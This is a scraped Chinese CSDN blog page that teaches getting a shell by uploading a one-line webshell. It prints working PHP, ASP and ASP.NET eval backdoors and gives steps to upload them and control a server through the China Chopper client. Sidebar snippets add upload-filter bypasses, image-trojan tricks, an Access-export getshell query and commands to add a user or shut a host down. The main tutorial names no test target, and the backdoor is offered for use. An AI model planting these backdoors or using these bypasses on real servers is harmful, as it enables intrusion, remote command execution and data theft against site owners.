上传一句话木马拿shell教程

最新推荐文章于 2024-09-18 20:02:13 发布
最新推荐文章于 2024-09-18 20:02:13 发布
阅读量1.2w 收藏 30
点赞数 5
分类专栏: 渗透测试 文章标签: 菜刀 webshell 一句话木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/milkway2013/article/details/88720803
版权

0x00 前言

一句话木马:

<?php @eval($_POST['pass']);?>

ASP:    <%eval request("pass")%>

ASP.NET:    <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

原理:

php的eval()函数:eval($str)函数是把$str当做PHP代码执行。 

0x01 实战

  1. 创建muma.php 然后将<?php @eval($_POST['pass']);?>复制进去
  2. 然后上传到服务器中

3.上菜刀链接:

右击添加:

右击文件管理:

右击虚拟终端:

 

 

0x02 遇到的问题

在下图中,两个必须相同

mad-coding
关注
专栏目录
一句话木马Shell菜刀原理
悦分享
07-12 1570
1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2. 有时上传图片格式的木马,居然被程序检测拦截了,右键记事本打开木马,在代码最前面加上gif89a,再数据库备份备份成asp格式的木马拿下shell。3. 上传图片格式木马,复制地址到数据库备份备份成asp格式木马,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp;
「渗透」:一句话木马反弹shell的思路
binaxin的博客
10-06 2195
前提:现在情况是已经上传一句话木马,可以执行命令如:ls,pwd,whoami等;问题在于,不管用python、bash还是perl都反弹不了,偷不了懒,就上msf把。 http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=pwd /u01/oracle/user_projects/domains/base_domain http://target-ip/where/muma/path/are/158.
网络安全:文件上传 + 一句话木马原理 + 菜刀的简单使用
垃圾管理员的垃圾站
09-01 1万+
很多的网站提供了文件上传功能,虽然提供了方便的服务,但稍有疏忽,就可能酿成大祸。 这里的疏忽是指,不对用户上传的内容进行检查。 仍旧以DVWA为例: 网站的本意是接受用户的图片(image),但后台代码却并没有对文件进行检测: 网页源码(部分截图): php处理源码: 文本也贴出来: File Upload Source vulner...
文件上传一句话木马getshell
qq_41620273的博客
12-25 5679
文件上传 文件上传流程: a.文件表单提交 b.生成临时文件(读取临时文件信息) c.后端语言判断该文件是否合规 d.合规则保存文件 一句话木马: 1.在phpstudy搭建的站点www目录下写入一个php文件,访问该网站下的php文件成功: 命令执行函数:system()、Exec()、 Shell_exec() passthru(): 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上 1.如url中输入:XXXX/1.php?a=net user mqu sss /add
PHP一句话木马免杀方式汇总
qq_48368964的博客
08-22 831
create_function函数把用户传递的数据生成一个函数fun(),然后再执行fun()php$fun();?
一句话木马及文件上传
zhong_yan的博客
10-28 5387
前言,本博客只用于记录,不用于参考,并且并非真实的网站,而是搭建的靶场。 (要是学长看了我的博客的话,能不能告诉我咱学校的网站有没有后门什么的(划掉),传授一些经验。) 第一步:文件上传靶场upload-labs搭建 首先,启动PHP_study.(什么,不知道,不会上网查吗。zhong_yan博主,你可真是个废物) 将upload-labs-master拖拽至WWW(PHP_study)目录(本博客只是记录,并非参考) 之后启动,就上面的那张图片(阿帕奇就可以了) ...
webshell一句话木马
Jim的博客
08-18 3075
asp一句话木马 %> "" Then execute(request("sb"))%> 补充知识: asp代码执行漏洞: Eval函数接受一个包含VBScript表达式的字符串 php一句话木马  //容错代码 @eval($_POST[sb])   //绕过
一句话木马上传常见的几种方法
YidaHu的博客
01-06 3万+
1,利用00截断,brupsuite上传利用00截断就是利用程序员在写程序时对文件的上传路径过滤不严格,产生0X00上传截断漏洞。 假设文件的上传路径为http://xx.xx.xx.xx/upfiles/lubr.php.jpg ,通过Burpsuite抓包截断将lubr.php后面的“.”换成“0X00”。在上传的时候,当文件系统读到”0X00″时,会认为文件已经结束,从而将lubr.php.
使用Weevely工具上传一句话木马
一颗小松子.的博客
01-27 3120
Weevely在上传木马进行后渗透测试的过程中可用于模拟一个类似于telnet的连接shell 通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理 Weevely生成的服务器端php代码经过了base64编码,可以绕过主流的杀毒软件和IDS 上传服务器端代码后通常可以通过weevely直接运行 使用它可以浏览文件系统,检测服务器设置,创建tcpshell和reverse shell
php一句话木马菜刀,如何基于菜刀PHP一句话实现单个文件批量上传
weixin_35741494的博客
03-09 1962
本文原创作者:安全小飞侠0x00 前言很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀的php一句话为例来分析一下如何实现这类需求。0x01 原理分析首先,我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。下面是最常见...
木马提取详细解析教程
qq_63060814的博客
04-04 4035
注入木马(<?php @eval($_POST[‘hello’]);?> 打开终端使用weevely命令启动工具 Weevely -h(查看工具的完整的使用方法) 使用命令weevelygeneratehello/root/hello.php(hello为密码,/root/hello.php为输出路径)来生成weevely一句话木马 使用命令weevelyhttp://172.16.1.15/hackable/uploads/hello.php hello连接w...
上传漏洞】之图片一句话
吃饭不想用筷子丶
08-10 1182
0x01:保存一张图片,jpg/png/gif格式都可以 0x02:使用C32Asm(十六进制)将图片打开,然后将一句话写到十六进制图片的后边,保存即可
MSF模拟渗透测试之一句话木马shell
lza20001103的博客
04-08 3953
MSF模拟渗透测试之一句话木马shell
数据库命令执行Getshell
m0_53087192的博客
01-19 958
Access导出 Access可导出xxx等文件需要配合解析漏洞 create table cmd (a varchar(50)); insert into cmd (a) values ('一句话木马') #一句话木马如:<%execute request(1)%> select * into [a] in 'e:\web\webshellcc\1.asa;x.xls' 'excel 4.0;' from cmd drop table cmd 菜刀直连https://www.xxx.c
PHP一句话木马集合
闵行小鱼塘
05-21 1万+
whoam1(QQ:2069698797)大佬早些年做的PHP一句话木马集合,在此记录下
文件上传漏洞
m0_70683009的博客
05-21 1206
如果对方中间件是apache属于低版本,我们可以利用文件上传上传一个不识别的文件后缀,利用解析漏洞规则成功解析文件,其中的后门代码被执行。,可以被当作php文件进行解析,从最后一个.mmm开始,apache不认识,就往前走,一直到.php,这样即绕过了验证,有可以进行解析。⑤:不删除末尾的点,在后缀名加点(需要在抓到的数据包中加点,直接在文件后缀名加点会命名不成功,它会自动删除点)(2) 当上传文件.asp;上传可以上传的文件,在文件地址后加上/x.php,可以让文件以php代码去执行。
文件上传-php
最新发布
m0_73255659的博客
09-18 1352
Enctype 上传类型Method 提交方式Onsubmit 鼠标的时间。
图片木马制作的三种方法
热门推荐
whatday的专栏
01-25 6万+
1.Copy命令制作 1.asp内容: 打开cmd,数据一下命令: 此时打开两个jpg文件,相比: 且打开2.jpg可以像1.jpg一样显示图像。 把以下代码放入目标网站,即可按asp执行。 2.Uedit32 本制作来自于:雪糕。 我们通常在得到webshell之后都想给自己留
使用蚁剑作为webshell管理工具完成以下要求 1、上传PHP木马到靶场(使用dvwa) 2、使用蚁剑链接一句话木马 3、通过蚁剑完成新建文件夹 4、通过蚁剑完成文件下载 5、通过蚁剑完成定时关机 并给出详细步骤与相对应的命令代码
11-19
以下是使用蚁剑作为webshell管理工具完成要求的详细步骤和相应的命令代码: 1. 上传PHP木马到靶场(使用dvwa) - 在本地创建一个名为shell.php的文件,将一句话木马代码写入该文件中。 - 使用dvwa靶场的文件上传功能,将该文件上传至靶场。 2. 使用蚁剑链接一句话木马 - 打开蚁剑客户端,点击“连接”按钮,输入靶场的IP地址和上传一句话木马的文件名(例如:http://192.168.0.1/shell.php)。 - 点击“连接”按钮,成功连接后即可使用蚁剑进行管理。 3. 通过蚁剑完成新建文件夹 - 在蚁剑客户端的左侧文件管理器中,右键点击要新建文件夹的目录,选择“新建文件夹”。 - 输入文件夹名称后,点击“确定”按钮即可完成新建。 4. 通过蚁剑完成文件下载 - 在蚁剑客户端的左侧文件管理器中,找到要下载的文件,右键点击该文件,选择“下载”。 - 选择保存的路径和文件名,点击“保存”按钮即可完成下载。 5. 通过蚁剑完成定时关机 - 在蚁剑客户端的“CMD”标签页中,输入“shutdown -s -t 60”命令,其中“60”表示倒计时的秒数。 - 按下回车键后,系统将在60秒后自动关机。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值